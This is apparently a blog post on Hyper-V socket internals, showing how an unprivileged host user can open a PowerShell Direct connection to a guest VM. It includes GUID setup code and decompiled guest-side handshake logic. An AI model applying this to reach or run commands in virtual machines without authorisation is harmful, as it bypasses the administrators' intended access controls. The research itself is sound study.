<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//when you call CONNECT with that GUID Portable Device Enumerator Service will start in guest OS (even in shielded VM)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">guest OS starts this service, because it believes, that triggered device was appeared in system.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">One point: before do this you must add GUID to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices as key in Host OS (need local admin rights) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="98" src="https://lh5.googleusercontent.com/Oz7Yy7H8L64s-CII-5MqPL4wWKCdHF-xlnXJWVa-v8-OErbrdanf7-zAsDEOO_r19WfBobwHJImvTRxgnrNzoGVrRd2kqHo1VL7IDcmuYtE5T0PpYIa5baPlLzblNgHu5M5-OLWg_KFjE9s3ig" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="259" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It works on Shielded VM too (tested in Admin-Trusted mode), besides Hyper-V Powershell Direct Service – it not started</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="194" src="https://lh4.googleusercontent.com/ICxvOdoe-DMPruEIZcv8OGZ2vcBTuTbwAu5QiFBDo9kgB5XIQTlKOVX7q7yUbu6z3rAlSDTDzqA1cfuTkQWIzjCMOALDVAIIPJmmBcXUDMvXopuzxsn12KYtennw6ZwLaSYjfCHI4JyX53XI0A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="233" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> I</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">t very interesting to see integration between Hyper-V sockets and PnP subsystem in Windows.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-7594706141189972742017-06-17T01:54:00.002-07:002017-06-17T04:18:01.576-07:00Powershell Direct (few internals). Part 2 <div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-3006072b-b541-4f4a-f4b3-1309405ca744" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">According </span><a href="https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/manage/manage-windows-virtual-machines-with-powershell-direct" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/manage/manage-windows-virtual-machines-with-powershell-direct</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Powershell Direct session needs Hyper-V administrator privilege for user, which start that session. Yes, it is true, if you use Enter-PSSession cmdlet, but if you will be use Hyper-V sockets natively you don’t need any privileges for it.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinZYfV0iZks8tDd63qNgL5_HPKO361P1gpUtMsVKFwhHNPpie4Z8WoWnNmHgeFnqp-ul2q8wkgD7WxSYWgcRwmB-dqDn34bRO8wu2ncYskWqwmEAxCD7IdbmctGAUSnu7SJ5khYtV_Q0tW/s1600/%25D0%2591%25D0%25B5%25D0%25B7%25D1%258B%25D0%25BC%25D1%258F%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1019" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinZYfV0iZks8tDd63qNgL5_HPKO361P1gpUtMsVKFwhHNPpie4Z8WoWnNmHgeFnqp-ul2q8wkgD7WxSYWgcRwmB-dqDn34bRO8wu2ncYskWqwmEAxCD7IdbmctGAUSnu7SJ5khYtV_Q0tW/s320/%25D0%2591%25D0%25B5%25D0%25B7%25D1%258B%25D0%25BC%25D1%258F%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9.png" width="320" /></a></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><br />
<br />
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><br />
<a name='more'></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Log on in Hyper-V host as user without special privileges (that user is member local Users group only). Run application, that make CONNECT call to any guest VM which run on that host (you can use ClientExample app, which was described in this blog early - </span><a href="https://github.com/gerhart01/HyperV-sockets" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/HyperV-sockets</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You need change HV_PARENT_GUID to GUID of guest OS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WSADATA</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> wsaData;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> clientService;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VmID, ServiceID;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Initialize GUIDs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//wchar_t* clsid_str = L"{a42e7cda-d03f-480c-9cc2-a4de20abb878}"; // HV_PARENT_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{6a964317-1d87-4a74-abf9-46a69b048900}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &VmID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{999e53d4-3d5c-4c3e-8779-bed06ec056e1}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Powershell Direct Service</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When you run it you get message from guest OS:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="63" src="https://lh6.googleusercontent.com/p8hi4-rsxK57Z_2JK3NeMjKN4o7U4-p1vV9O5JltW_m4LMZoXR6V8H_0KdorgsEZUlkNtzQo2qAhgSOhaowdTTuCZ4MBHmgHCidvYY4CrJbds5ucpPUU9oOXlIVvhv6wV6NeVcUh3_EMPTqwEQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="177" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It begins of PoSh Direct communication protocol. We can see details in OutOfProcTransportManager.cs and RemoteSessionHyperVSocket.cs files of Powershell source code and icsvc.dll library (guest OS module, which handle communication on start):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> if ( </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v23</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 520, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PASS"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 4, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v22</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 520, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PASS"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 4, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v20</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 260, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: blue; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">strcmp_0</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v20</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EMPTYPW"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> && (</span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PASS"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 4, 0) == 0xFFFFFFFF || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v21</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 520, 0) == 0xFFFFFFFF) )</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we get that part of protocol from powershell source and compile it in standalone module, we can communicate with guest OS and execute command as user which credential we send for LogonUserExExW (icsvc start Powershell process with this credentials).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Of course, it not vulnerability in Hyper-V sockets mechanism (it was designed as usual TCP sockets which don’t need any special permission for working), but it looks like that it may be described more correctly in Microsoft docs.</span></div>
